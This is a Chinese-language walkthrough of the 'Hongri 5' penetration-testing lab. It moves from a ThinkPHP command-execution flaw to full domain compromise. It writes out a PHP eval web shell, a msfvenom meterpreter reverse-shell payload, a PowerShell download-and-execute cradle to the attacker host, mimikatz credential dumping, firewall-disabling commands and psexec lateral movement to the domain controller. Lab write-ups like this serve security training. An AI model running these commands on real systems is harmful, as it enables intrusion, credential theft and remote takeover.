红日靶场5

kali攻击机:192.168.43.54

web目标:192.168.43.2     192.168.22.134

DC控制器:192.168.22.133

该实验需要进入web服务器手动开启web服务,开启后对其进行渗透测试
 

虚拟机密码

win7

sun\heart 123.com

sun\Administrator dc123.com

2008

sun\admin 2020.com

Win7双网卡模拟内外网

1、nmap扫描发现主机

nmap -A 192.168.43.54/24 

└─# nmap -A 192.168.43.54/24
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-09 20:48 EST
Nmap scan report for 192.168.43.2
Host is up (0.00056s latency).
Not shown: 990 closed tcp ports (reset)
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.5.38)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.5.38
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: SUN)
3306/tcp  open  mysql        MySQL (unauthorized)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC

开启80端口,访问目标。发现是thinkphp框架

使用工具getshell,存在命令执行漏洞,

写入后门一句话,

echo "<?php @eval($_POST[cmd]);?>" >shell.php

蚁剑进行连接成功

msf生成后门,蚁剑进行上传获取shell

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.54 lport=8080 -f exe -o 8080.exe

开启监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.43.54
set lport 8080
exploit
​

蚁剑进行执行

获取到shell,

进行权限提升,尝试令牌窃取失败,尝试使用烂土豆配合令牌窃取提权,上传烂土豆

回到msf,执行烂土豆

execute -cH -f ./potato.exe

再次尝试进行令牌窃取,成功获得sysytem权限

进行信息收集,发现存在域

收集网卡信息,发现存在第二张网卡,添加路由

方法一、cs

上线cobalstrike,生成payload

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.43.54:80/a'))"

在服务器执行,成功上线

 

查看其他域内主机信息:shell net view
判断是否存在多个域:shell net view /domain
查看域内用户:shell net user /domain
查看域控制器:net group “domain controllers” /domain
查看域管理员的名字:net group “domain admins” /domain

通过信息收集,目标主机所在的域环境,域名为sun.com,存在两台域主机DC和win7.DC的ip为:192.168.22.134,win7双网卡:192.168.43.2、192.168.22.134。其中域控制器DC.sun.com,域管理员为Administrator。

扫描ip和DC端口开放情况

portscan 192.168.22.0/24 1-6000 arp 10
portscan 192.168.22.133 1-1024,3389,5900-6000 none 1024

抓取明文密码

获得明文密码,利用PsExec64进行横向移动,使用前需要关闭防火墙,445端口还得是开放的

关闭防火墙

shell NetSh Advfirewall set allprofiles state off

首先建立正向监听

 

选择目标中的DC,使用收集到的密码进行psexec横向移动

成功上线DC

方法二、msf

我们在上面已经通过烂土豆配合令牌窃取获得system权限了,添加22网段路由转发

run autoroute -s 192.168.22.0/24

使用wiki模块抓取密码

load kiwi
 kiwi_cmd privilege::debug
 kiwi_cmd sekurlsa::logonPasswords

报错了kiwi只能在x86进程下执行,那就使用进程迁移

重新抓取密码

利用Psexec模块登录域控

use exploit/windows/smb/psexec
set rhosts 192.168.22.133  //域控ip
set SMBDomain SUN
set SMBUser administrator  //域控用户
set SMBPass tfcTFC123 #密码
set payload windows/meterpreter/bind_tcp
set lport 6666
Run

有时可能还需要关闭 防火墙

利用shell建立连接,关闭防火墙
​
net use \192.168.22.133\ipc$ “Lwj.123456” /user:“administrator”
sc \192.168.22.133 create unablefirewall binpath= “netsh advfirewall set allprofiles state off”
sc \192.168.22.133 start unablefirewall

即可上线

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值